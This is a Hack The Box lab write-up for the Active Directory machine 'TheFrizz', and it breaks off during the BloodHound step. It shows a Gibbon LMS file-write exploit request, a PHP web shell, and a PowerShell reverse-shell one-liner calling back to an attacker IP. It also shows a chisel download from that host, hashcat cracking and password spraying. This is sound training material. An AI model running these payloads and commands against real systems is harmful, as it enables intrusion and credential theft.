TheFrizz
AD box on HTB.
Enumeration:
Port Scanning:
Nmap:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/TheFrizz]
└─$ sudo nmap -sCV -p- --min-rate 4000 -oA nmap/services -vv 10.129.20.43
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-17 20:31 +03
Nmap scan report for 10.129.20.43
Host is up, received echo-reply ttl 127 (0.15s latency).
Scanned at 2025-09-17 20:31:40 +03 for 258s
Not shown: 65515 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 127 OpenSSH for_Windows_9.5 (protocol 2.0)
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
80/tcp open http syn-ack ttl 127 Apache httpd 2.4.58 (OpenSSL/3.1.3 PHP/8.2.12)
|_http-server-header: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Did not follow redirect to http://frizzdc.frizz.htb/home/
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-09-18 00:32:39Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: frizz.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack ttl 127
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: frizz.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack ttl 127
9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing
<snipped>
Service Info: Hosts: localhost, FRIZZDC; OS: Windows; CPE: cpe:/o:microsoft:windows
<snipped>
|_clock-skew: 7h00m01s
<snipped>We have another AD DC, but this time we have ports 22, and 80 open.
Lets get the FQDN using netexec:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/TheFrizz]
└─$ nxc smb 10.129.20.43
SMB 10.129.20.43 445 10.129.20.43 [*] x64 (name:10.129.20.43) (domain:10.129.20.43) (signing:True) (SMBv1:False) (NTLM:False)We will notice the NTLM authentication is disabled, so we have to use kerberos only.
I will get the FQDN from the nmap result above, and pass it to netexec, and we will see that it resolved the FQDN to the corresponding IP address:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/TheFrizz]
└─$ nxc smb FRIZZDC.frizz.htb -k
SMB FRIZZDC.frizz.htb 445 FRIZZDC [*] x64 (name:FRIZZDC) (domain:frizz.htb) (signing:True) (SMBv1:False) (NTLM:False)I will add it to the hosts file:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/TheFrizz]
└─$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
<snipped>
10.129.20.43 FRIZZDC.frizz.htb frizz.htb FRIZZDCAlso in the nmap result we will see the clock skew is too great, so I will use ntpdate to sync:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/TheFrizz]
└─$ sudo ntpdate 10.129.20.43
2025-09-18 05:27:11.891187 (+0300) +25202.019863 +/- 0.074320 10.129.20.43 s1 no-leap
CLOCK: time stepped by 25202.019863Lets get a quick overview of the web application framework or stack via whatweb:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/TheFrizz]
└─$ whatweb http://frizz.htb/
http://frizz.htb/ [302 Found] Apache[2.4.58], Country[RESERVED][ZZ], HTTPServer[Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12], IP[10.129.20.43], OpenSSL[3.1.3], PHP[8.2.
12], RedirectLocation[http://frizzdc.frizz.htb/home/], Title[302 Found]So the webserver is apache, and we have PHP as the backend language, and it redirects us to frizzdc.frizz.htb.
Lets open it up with Firefox:
Nothing really interesting, but click on staff login:
We will find gibbon lms framework is running on the webserver, and it exposes its current version which is 25.
Exploitation:
Search for any public exploits:
We will come across this web page that outlines the vulnerability and its severity and some references:
Scroll down, we will find POC in one of the references:
Vulnerable code:
$img = $_POST['img'] ?? null;
$imgPath = $_POST['path'] ?? null;
$gibbonPersonID = !empty($_POST['gibbonPersonID']) ? str_pad($_POST['gibbonPersonID'], 10, '0', STR_PAD_LEFT) : null;
$absolutePath = $gibbon->session->get('absolutePath');
if (empty($img) || empty($gibbonPersonID) || empty($absolutePath)) {
return;
}
// Decode raw image data
list($type, $img) = explode(';', $img);
list(, $img) = explode(',', $img);
$img = base64_decode($img);We will see that it accepts a file without any sanitation, and it decodes the content of a file in this case an image, where we can inject our payload.
The POC mentioned by that guy:
POST /modules/Rubrics/rubrics_visualise_saveAjax.php HTTP/1.1
Host: localhost:8080
[...]
img=image/png;asdf,PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbJ2NtZCddKT8%2b&path=asdf.php&gibbonPersonID=0000000001There are multiple exploits on github, but to not be a script kiddie, I will exploit it manually.
Craft the POST request and send it via BurpSuite.
I will write a simple php web shell:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/TheFrizz]
└─$ cat simple_webshell.php
<?php system($_REQUEST['cmd']); ?>
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/TheFrizz]
└─$ cat simple_webshell.php | base64
PD9waHAgc3lzdGVtKCRfUkVRVUVTVFsnY21kJ10pOyA/Pgo=Before sending the request, we have to URL encode the payload, and add x-www-form-urlencoded to content-type header, so the application knows what we are sending to it:
Now lets try to run whoami:
Reverse shell as w.webservice:
We can use web cradle to get a reverse shell.
From nishang powershell scripts, I will grab the powershell tcp onliner, and edit it to add my own IP address and the port we want the connect to go to:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/TheFrizz]
└─$ cat shell.ps1
$client = New-Object System.Net.Sockets.TCPClient('10.10.16.2',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()Start a python web server to host the shell.ps1:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/TheFrizz]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...Also start our netcat listener:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/TheFrizz]
└─$ rlwrap nc -nlvp 443
listening on [any] 443 ... Execute our powershell cradle:
10.129.20.43 - - [18/Sep/2025 06:21:47] "GET /shell.ps1 HTTP/1.1" 200 -And we will get a reverse shell:
connect to [10.10.16.2] from (UNKNOWN) [10.129.20.43] 60837
PS C:\xampp\htdocs\Gibbon-LMS> whoami
frizz\w.webserviceAfter doing some enumeration, we will find config.php file which often has some useful information:
PS C:\xampp\htdocs\Gibbon-LMS> dir
Directory: C:\xampp\htdocs\Gibbon-LMS
Mode LastWriteTime Length Name
---- ------------- ------ ----
<snipped>
-a---- 1/20/2023 6:04 AM 294353 composer.lock
-a---- 10/11/2024 8:15 PM 1307 config.php
-a---- 1/20/2023 6:04 AM 3733 error.php
<snipped>Read it:
PS C:\xampp\htdocs\Gibbon-LMS> cat config.php
<?php
<snipped>
$databaseServer = 'localhost';
$databaseUsername = 'MrGibbonsDB';
$databasePassword = 'MisterGibbs!Parrot!?1';
$databaseName = 'gibbon';
<snipped>Here we have username and password for a database, we can interact with it with mysql.exe present on the target system, or perform port forwarding to use the kali's mysql.
Check what local ports are open:
PS C:\Windows\Tasks> netstat -ano | findstr LISTENING
TCP 0.0.0.0:22 0.0.0.0:0 LISTENING 2016
TCP 0.0.0.0:80 0.0.0.0:0 LISTENING 2160
TCP 0.0.0.0:88 0.0.0.0:0 LISTENING 652
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 956
TCP 0.0.0.0:389 0.0.0.0:0 LISTENING 652
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:464 0.0.0.0:0 LISTENING 652
TCP 0.0.0.0:593 0.0.0.0:0 LISTENING 956
TCP 0.0.0.0:636 0.0.0.0:0 LISTENING 652
TCP 0.0.0.0:3268 0.0.0.0:0 LISTENING 652
TCP 0.0.0.0:3269 0.0.0.0:0 LISTENING 652
TCP 0.0.0.0:3306 0.0.0.0:0 LISTENING 3696
TCP 0.0.0.0:9389 0.0.0.0:0 LISTENING 1908
<snipped> We will see mysql running locally.
Port Forwarding:
I will upload chisel.exe to a writeable directory:
PS C:\xampp\htdocs\Gibbon-LMS> cd \Windows\Tasks
PS C:\Windows\Tasks> curl http://10.10.16.2/chisel.exe -o chisel.exeStart the server:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/TheFrizz]
└─$ /opt/Tools/Pivoting/chisel/chisel server -p 1234 -reverse
2025/09/17 21:57:50 server: Reverse tunnelling enabled
2025/09/17 21:57:50 server: Fingerprint GFrBWG+7hbItUPCGoJBC62XRgF0hNLEFG8lie613IAY=
2025/09/17 21:57:50 server: Listening on http://0.0.0.0:1234Then run the client to forward port 3306 on local host to our machine:
PS C:\Windows\Tasks> .\chisel.exe client 10.10.16.2:1234 R:3306:localhost:3306We will recieve the connection on our server:
2025/09/17 21:59:11 server: session#1: tun: proxy#R:3306=>localhost:3306: ListeningCheck for listening ports on our kali VM:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/TheFrizz]
└─$ netstat -antp
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
<snipped>
tcp6 0 0 :::3306 :::* LISTEN 163382/chisel
<snipped>
tcp6 0 0 10.10.16.2:1234 10.129.20.43:60843 ESTABLISHED 163382/chisel
<snipped>Authenticate to the database with the credentials we found earlier:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/TheFrizz]
└─$ mysql -h localhost -u MrGibbonsDB -p -P 3306 --skip-ssl
Enter password: MisterGibbs!Parrot!?1
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 61
Server version: 10.4.32-MariaDB mariadb.org binary distribution
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]>We can start enumerating the database for any appealing data:
MariaDB [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| gibbon |
| information_schema |
| test |
+--------------------+
3 rows in set (0.266 sec)
MariaDB [(none)]> use gibbon;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MariaDB [gibbon]> show tables;
+---------------------------------------+
| Tables_in_gibbon |
<snipped>
| gibbonpayment |
| gibbonpermission |
| gibbonperson |
| gibbonpersonaldocument |
<snipped>
+---------------------------------------+
191 rows in set (0.279 sec)We will find gibbonperson table, we can use desc to check its columns:
MariaDB [gibbon]> desc gibbonperson;
+---------------------------+-------------------------------------------------------+------+-----+-------------+----------------+
| Field | Type | Null | Key | Default | Extra |
+---------------------------+-------------------------------------------------------+------+-----+-------------+----------------+
<snipped>
| gender | enum('M','F','Other','Unspecified') | NO | | Unspecified | |
| username | varchar(20) | NO | UNI | NULL | |
| passwordStrong | varchar(255) | NO | | NULL | |
| passwordStrongSalt | varchar(255) | NO | | NULL | |
| passwordForceReset | enum('N','Y') | NO | | N | |
<snipped>
+---------------------------+-------------------------------------------------------+------+-----+-------------+----------------+
94 rows in set (0.263 sec)What we are interested in only is username, passwordstrong, and passwordstrongsalt:
MariaDB [gibbon]> select username, passwordStrong, passwordStrongSalt from gibbonperson;
+-----------+------------------------------------------------------------------+------------------------+
| username | passwordStrong | passwordStrongSalt |
+-----------+------------------------------------------------------------------+------------------------+
| f.frizzle | 067f746faca44f170c6cd9d7c4bdac6bc342c608687733f80ff784242b0b0c03 | /aACFhikmNopqrRTVz2489 |
+-----------+------------------------------------------------------------------+------------------------+
1 row in set (0.254 sec)
MariaDB [gibbon]> exitSave the hash and the salt to a file:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/TheFrizz]
└─$ cat f.frizzle.hash
f.frizzle:067f746faca44f170c6cd9d7c4bdac6bc342c608687733f80ff784242b0b0c03:/aACFhikmNopqrRTVz2489We can check the hash type with a tool called haiti:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/TheFrizz]
└─$ haiti '067f746faca44f170c6cd9d7c4bdac6bc342c608687733f80ff784242b0b0c03'
SHA-256 [HC: 1400] [JtR: raw-sha256]
<snipped>So it is sha256 with salt.
Lets explore hashcat modes:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/TheFrizz]
└─$ hashcat -h
hashcat (v6.2.6) starting in help mode
Usage: hashcat [options]... hash|hashfile|hccapxfile [dictionary|mask|directory]...
<snipped>
1410 | sha256($pass.$salt) | Raw Hash salted and/or iterated
1420 | sha256($salt.$pass) | Raw Hash salted and/or iterated
22300 | sha256($salt.$pass.$salt) | Raw Hash salted and/or iterated
20720 | sha256($salt.sha256($pass)) | Raw Hash salted and/or iterated
21420 | sha256($salt.sha256_bin($pass)) | Raw Hash salted and/or iterated
1440 | sha256($salt.utf16le($pass)) | Raw Hash salted and/or iterated
20800 | sha256(md5($pass)) | Raw Hash salted and/or iterated
20710 | sha256(sha256($pass).$salt) | Raw Hash salted and/or iterated
21400 | sha256(sha256_bin($pass)) | Raw Hash salted and/or iterated
1430 | sha256(utf16le($pass).$salt) | Raw Hash salted and/or iterated
<snipped>We can try multiple of those hash modes, but also since the gibbon is open-source framework and we can view its code we can check as well for the algorithm used to hash the passwords.
I tried 1410, but could not find anything, but when I used 1420:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/TheFrizz]
└─$ hashcat -m 1420 f.frizzle.hash /usr/share/wordlists/rockyou.txt --username
hashcat (v6.2.6) starting
<snipped>
067f746faca44f170c6cd9d7c4bdac6bc342c608687733f80ff784242b0b0c03:/aACFhikmNopqrRTVz2489:Jenni_Luvs_Magic23
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 1420 (sha256($salt.$pass))
Hash.Target......: 067f746faca44f170c6cd9d7c4bdac6bc342c608687733f80ff...Vz2489
Time.Started.....: Wed Sep 17 22:25:14 2025 (5 secs)
Time.Estimated...: Wed Sep 17 22:25:19 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 2368.9 kH/s (0.17ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 11022336/14344385 (76.84%)
Rejected.........: 0/11022336 (0.00%)
Restore.Point....: 11019264/14344385 (76.82%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: Jensta -> JazIris@@
Hardware.Mon.#1..: Util: 19%
<snipped>Here we have valid credentials for a domain user (f.frizzle):
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/TheFrizz]
└─$ nxc smb frizzdc.frizz.htb -k -u f.frizzle -p 'Jenni_Luvs_Magic23'
SMB frizzdc.frizz.htb 445 frizzdc [*] x64 (name:frizzdc) (domain:frizz.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB frizzdc.frizz.htb 445 frizzdc [+] frizz.htb\f.frizzle:Jenni_Luvs_Magic23Shell as f.frizzle:
Get a TGT for f.frizzle with impacket-getTGT, and export it to KRB5CCNAME:
┌──(kali㉿kali)-[~/…/Machines/HackTheBox/TheFrizz]
└─$ impacket-getTGT frizz.htb/f.frizzle:Jenni_Luvs_Magic23 -dc-ip 10.129.20.43
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in f.frizzle.ccache
┌──(kali㉿kali)-[~/…/Machines/HackTheBox/TheFrizz]
└─$ export KRB5CCNAME=f.frizzle.ccacheNow we can authenticate via ssh.
But before that we will create krb5 file so our kali knows where to go when we are dealing with kerberos:
┌──(kali㉿kali)-[~/…/Machines/HackTheBox/TheFrizz]
└─$ netexec smb frizzdc.frizz.htb --generate-krb5-file krb5.conf└─$ nxc smb frizzdc.frizz.htb -k --generate-krb5-file krb5.conf
SMB frizzdc.frizz.htb 445 frizzdc [*] x64 (name:frizzdc) (domain:frizz.htb) (signing:True) (SMBv1:False) (NTLM:False)
┌──(kali㉿kali)-[~/…/Machines/HackTheBox/TheFrizz]
└─$ cat krb5.conf
[libdefaults]
dns_lookup_kdc = false
dns_lookup_realm = false
default_realm = FRIZZ.HTB
[realms]
FRIZZ.HTB = {
kdc = frizzdc.frizz.htb
admin_server = frizzdc.frizz.htb
default_domain = frizz.htb
}
[domain_realm]
.frizz.htb = FRIZZ.HTB
frizz.htb = FRIZZ.HTB
┌──(kali㉿kali)-[~/…/Machines/HackTheBox/TheFrizz]
└─$ sudo cp krb5.conf /etc/krb5.confAuthenticate with ssh:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/TheFrizz]
└─$ klist
Ticket cache: FILE:f.frizzle.ccache
Default principal: f.frizzle@FRIZZ.HTB
Valid starting Expires Service principal
09/18/2025 05:49:50 09/18/2025 15:49:50 krbtgt/FRIZZ.HTB@FRIZZ.HTB
renew until 09/19/2025 05:49:49
09/18/2025 05:50:58 09/18/2025 15:49:50 ldap/frizzdc.frizz.htb@FRIZZ.HTB
renew until 09/19/2025 05:49:49
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/TheFrizz]
└─$ ssh f.frizzle@frizz.htb
The authenticity of host 'frizz.htb (10.129.20.43)' can't be established.
ED25519 key fingerprint is SHA256:667C2ZBnjXAV13iEeKUgKhu6w5axMrhU346z2L2OE7g.
This host key is known by the following other names/addresses:
~/.ssh/known_hosts:8: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'frizz.htb' (ED25519) to the list of known hosts.
PowerShell 7.4.5
PS C:\Users\f.frizzle>Lateral Movement to m.schoolbus:
Local Enumeration:
After doing some enumeration, I found a 7z file stored in the recycle bin of f.frizzle:
PS C:\> dir -force
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d--hs 9/17/2025 8:33 PM $RECYCLE.BIN
d--h- 3/10/2025 3:31 PM $WinREAgent
d--hs 7/24/2025 12:41 PM Config.Msi
l--hs 10/29/2024 9:12 AM Documents and Settings -> C:\Users
d---- 3/10/2025 3:39 PM inetpub
d---- 5/8/2021 1:15 AM PerfLogs
d-r-- 7/24/2025 12:41 PM Program Files
d---- 5/8/2021 2:34 AM Program Files (x86)
d--h- 2/20/2025 2:50 PM ProgramData
d--hs 10/29/2024 9:12 AM Recovery
d--hs 10/29/2024 7:25 AM System Volume Information
d-r-- 10/29/2024 7:31 AM Users
d---- 3/10/2025 3:41 PM Windows
d---- 10/29/2024 7:28 AM xampp
-a-hs 10/29/2024 8:27 AM 12288 DumpStack.log.tmp
PS C:\> cd '$RECYCLE.BIN'
PS C:\$RECYCLE.BIN> dir -force
Directory: C:\$RECYCLE.BIN
Mode LastWriteTime Length Name
---- ------------- ------ ----
d--hs 10/29/2024 7:31 AM S-1-5-21-2386970044-1145388522-2932701813-1103
d--hs 9/17/2025 8:33 PM S-1-5-21-2386970044-1145388522-2932701813-1120
PS C:\$RECYCLE.BIN> cd 'S-1-5-21-2386970044-1145388522-2932701813-1103'
PS C:\$RECYCLE.BIN\S-1-5-21-2386970044-1145388522-2932701813-1103> dir -force
Directory: C:\$RECYCLE.BIN\S-1-5-21-2386970044-1145388522-2932701813-1103
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a--- 10/29/2024 7:31 AM 148 $IE2XMEG.7z
-a--- 10/24/2024 9:16 PM 30416987 $RE2XMEG.7z
-a-hs 10/29/2024 7:31 AM 129 desktop.ini
PS C:\$RECYCLE.BIN\S-1-5-21-2386970044-1145388522-2932701813-1103> type '$IE2XMEG.7z'
<snipped>C:\Users\f.frizzle\AppData\Local\Temp\wapt-backup-sunday.7zCopy it to our local machine via scp:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/TheFrizz]
└─$ scp f.frizzle@frizz.htb:'C:\\$RECYCLE.BIN\\S-1-5-21-2386970044-1145388522-2932701813-1103\\$RE2XMEG.7z' .
C:\$RECYCLE.BIN\S-1-5-21-2386970044-1145388522-2932701813-1103\$RE2XMEG.7z 100% 29MB 2.7MB/s 00:10 Rename it and unzip it to see what it contains:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/TheFrizz]
└─$ mv C:\\\$RECYCLE.BIN\\S-1-5-21-2386970044-1145388522-2932701813-1103\\\$RE2XMEG.7z wapt-backup-sunday.7z
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/TheFrizz]
└─$ mkdir backup
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/TheFrizz]
└─$ cd backup
┌──(kali㉿kali)-[~/…/Machines/HackTheBox/TheFrizz/backup]
└─$ 7z x ../wapt-backup-sunday.7z
7-Zip 25.01 (x64) : Copyright (c) 1999-2025 Igor Pavlov : 2025-08-03
<snipped>
Everything is Ok
Folders: 684
Files: 5384
Size: 141187501
Compressed: 30416987
┌──(kali㉿kali)-[~/…/Machines/HackTheBox/TheFrizz/backup]
└─$ ls
wapt
┌──(kali㉿kali)-[~/…/Machines/HackTheBox/TheFrizz/backup]
└─$ cd wapt
┌──(kali㉿kali)-[~/…/HackTheBox/TheFrizz/backup/wapt]
└─$ ls -la
total 45012
drwxrwxr-x 18 kali kali 4096 Oct 23 2024 .
drwxrwxr-x 3 kali kali 4096 Sep 18 07:09 ..
-rw-rw-r-- 1 kali kali 6147 Sep 11 2024 auth_module_ad.py
drwxrwxr-x 3 kali kali 4096 Oct 23 2024 cache
-rw-rw-r-- 1 kali kali 412462 Sep 11 2024 common.py
drwxrwxr-x 2 kali kali 4096 Oct 23 2024 conf
drwxrwxr-x 2 kali kali 4096 Oct 23 2024 conf.d
-rw-rw-r-- 1 kali kali 5730 Sep 11 2024 COPYING.txt
<snipped>We have conf folder.
See what files in it:
┌──(kali㉿kali)-[~/…/HackTheBox/TheFrizz/backup/wapt]
└─$ cd conf
┌──(kali㉿kali)-[~/…/TheFrizz/backup/wapt/conf]
└─$ ls
ca-192.168.120.158.crt ca-192.168.120.158.pem forward_ssl_auth.conf require_ssl_auth.conf uwsgi_params waptserver.ini waptserver.ini.templateOne of the files has an juicy string:
┌──(kali㉿kali)-[~/…/TheFrizz/backup/wapt/conf]
└─$ cat waptserver.ini
[options]
allow_unauthenticated_registration = True
wads_enable = True
login_on_wads = True
waptwua_enable = True
secret_key = ylPYfn9tTU9IDu9yssP2luKhjQijHKvtuxIzX9aWhPyYKtRO7tMSq5sEurdTwADJ
server_uuid = 646d0847-f8b8-41c3-95bc-51873ec9ae38
token_secret_key = 5jEKVoXmYLSpi5F7plGPB4zII5fpx0cYhGKX5QC0f7dkYpYmkeTXiFlhEJtZwuwD
wapt_password = IXN1QmNpZ0BNZWhUZWQhUgo=
clients_signing_key = C:\wapt\conf\ca-192.168.120.158.pem
clients_signing_certificate = C:\wapt\conf\ca-192.168.120.158.crt
[tftpserver]
root_dir = c:\wapt\waptserver\repository\wads\pxe
log_path = c:\wapt\log
┌──(kali㉿kali)-[~/…/TheFrizz/backup/wapt/conf]
└─$ echo 'IXN1QmNpZ0BNZWhUZWQhUgo=' | base64 -d
!suBcig@MehTed!RSpray it across all users:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/TheFrizz]
└─$ nxc smb frizzdc.frizz.htb -k -u users.txt -p '!suBcig@MehTed!R' --continue-on-success
SMB frizzdc.frizz.htb 445 frizzdc [*] x64 (name:frizzdc) (domain:frizz.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB frizzdc.frizz.htb 445 frizzdc [-] frizz.htb\Administrator:!suBcig@MehTed!R KDC_ERR_PREAUTH_FAILED
<snipped>
SMB frizzdc.frizz.htb 445 frizzdc [-] frizz.htb\h.arm:!suBcig@MehTed!R KDC_ERR_PREAUTH_FAILED
SMB frizzdc.frizz.htb 445 frizzdc [+] frizz.htb\M.SchoolBus:!suBcig@MehTed!R
SMB frizzdc.frizz.htb 445 frizzdc [-] frizz.htb\d.hudson:!suBcig@MehTed!R KDC_ERR_PREAUTH_FAILED
<snipped>We have another valid domain user's password.
BloodHound:
Now its the time for BloodHound.
Run the ingesters:
┌──(kali㉿kali)-[~/…/Machines/HackTheBox/TheFrizz/bloodhound]05:51:11 [2704/3162]
└─$ rusthound-ce -k -u f.frizzle -d frzzdc.frizz.htb -f frizzdc.frizz.htb -i 10.129.20.43 -n 10.129.20.43
---------------------------------------------------
Initializing RustHound-CE at 05:50:56 on 09/18/25
Powered by @g0h4n_0
---------------------------------------------------
[2025-09-18T02:50:56Z INFO rusthound_ce] Verbosity level: Info
[2025-09-18T02:50:56Z INFO rusthound_ce] Collection method: All
[2025-09-18T02:51:00Z INFO rusthound_ce::ldap] Connected to FRZZDC.FRIZZ.HTB Active Directory!
[2025-09-18T02:51:00Z INFO rusthound_ce::ldap] Starting data collection...
[2025-09-18T02:51:00Z INFO rusthound_ce::ldap] Ldap filter : (objectClass=*)
[2025-09-18T02:51:02Z INFO rusthound_ce::ldap] All data collected for NamingContext DC=frizz,DC=htb
[2025-09-18T02:51:02Z INFO rusthound_ce::ldap] Ldap filter : (objectClass=*)
[2025-09-18T02:51:07Z INFO rusthound_ce::ldap] All data collected for NamingContext CN=Configuration,DC=frizz,DC=htb
[2025-09-18T02:51:07Z INFO rusthound_ce::ldap] Ldap filter : (objectClass=*)
[2025-09-18T02:51:11Z INFO rusthound_ce::ldap] All data collected for NamingContext CN=Schema,CN=Configuration,DC=frizz,DC=htb
[2025-09-18T02:51:11Z INFO rusthound_ce::ldap] Ldap filter : (objectClass=*)
[2025-09-18T02:51:11Z INFO rusthound_ce::ldap] All data collected for NamingContext DC=DomainDnsZones,DC=frizz,DC=htb
[2025-09-18T02:51:11Z INFO rusthound_ce::ldap] Ldap filter : (objectClass=*)
[2025-09-18T02:51:11Z INFO rusthound_ce::ldap] All data collected for NamingContext DC=ForestDnsZones,DC=frizz,DC=htb
[2025-09-18T02:51:11Z INFO rusthound_ce::api] Starting the LDAP objects parsing...
[2025-09-18T02:51:11Z INFO rusthound_ce::api] Parsing LDAP objects finished!
[2025-09-18T02:51:11Z INFO rusthound_ce::json::checker] Starting checker to replace some values...
[2025-09-18T02:51:11Z INFO rusthound_ce::json::checker] Checking and replacing some values finished!
[2025-09-18T02:51:11Z INFO rusthound_ce::json::maker::common] 22 users parsed!
[2025-09-18T02:51:11Z INFO rusthound_ce::json::maker::common] .//20250918055111_frzzdc-frizz-htb_users.json created!
[2025-09-18T02:51:11Z INFO rusthound_ce::json::maker::common] 61 groups parsed!
[2025-09-18T02:51:11Z INFO rusthound_ce::json::maker::common] .//20250918055111_frzzdc-frizz-htb_groups.json created!
[2025-09-18T02:51:11Z INFO rusthound_ce::json::maker::common] 1 computers parsed!
[2025-09-18T02:51:11Z INFO rusthound_ce::json::maker::common] .//20250918055111_frzzdc-frizz-htb_computers.json created!
[2025-09-18T02:51:11Z INFO rusthound_ce::json::maker::common] 2 ous parsed!
[2025-09-18T02:51:11Z INFO rusthound_ce::json::maker::common] .//20250918055111_frzzdc-frizz-htb_ous.json created!
[2025-09-18T02:51:11Z INFO rusthound_ce::json::maker::common] 3 domains parsed!
[2025-09-18T02:51:11Z INFO rusthound_ce::json::maker::common] .//20250918055111_frzzdc-frizz-htb_domains.json created!
[2025-09-18T02:51:11Z INFO rusthound_ce::json::maker::common] 2 gpos parsed!
[2025-09-18T02:51:11Z INFO rusthound_ce::json::maker::common] .//20250918055111_frzzdc-frizz-htb_gpos.json created!
[2025-09-18T02:51:11Z INFO rusthound_ce::json::maker::common] 73 containers parsed!
[2025-09-18T02:51:11Z INFO rusthound_ce::json::maker::common] .//20250918055111_frzzdc-frizz-htb_containers.json created!
RustHound-CE Enumeration Completed at 05:51:11 on 09/18/25! Happy Graphing!┌──(kali㉿kali)-[~/…/Machines/HackTheBox/TheFrizz/bloodhound]
└─$ bloodhound-python -k -u f.frizzle -ns 10.129.20.43 -d frizz.htb -dc frizzdc.frizz.htb -c all
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
Password:
INFO: Found AD domain: frizz.htb
INFO: Using TGT from cache
INFO: Found TGT with correct principal in ccache file.
INFO: Connecting to LDAP server: frizzdc.frizz.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: frizzdc.frizz.htb
INFO: Found 22 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 2 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10
INFO: Querying computer: frizzdc.frizz.htb
INFO: Done in 00M 42SStart BloodHound:
┌──(kali㉿kali)-[~/…/Machines/HackTheBox/TheFrizz/bloodhound]
└─$ sudo bloodhound
[sudo] password for kali:
Starting neo4j
<snipped>
Bloodhound will start
IMPORTANT: It will take time, please wait...
opening http://127.0.0.1:8080
<snipped>Searching for outbound object controls for m.schoolbus we will find that he/she is member of the group policy creator owners, which:
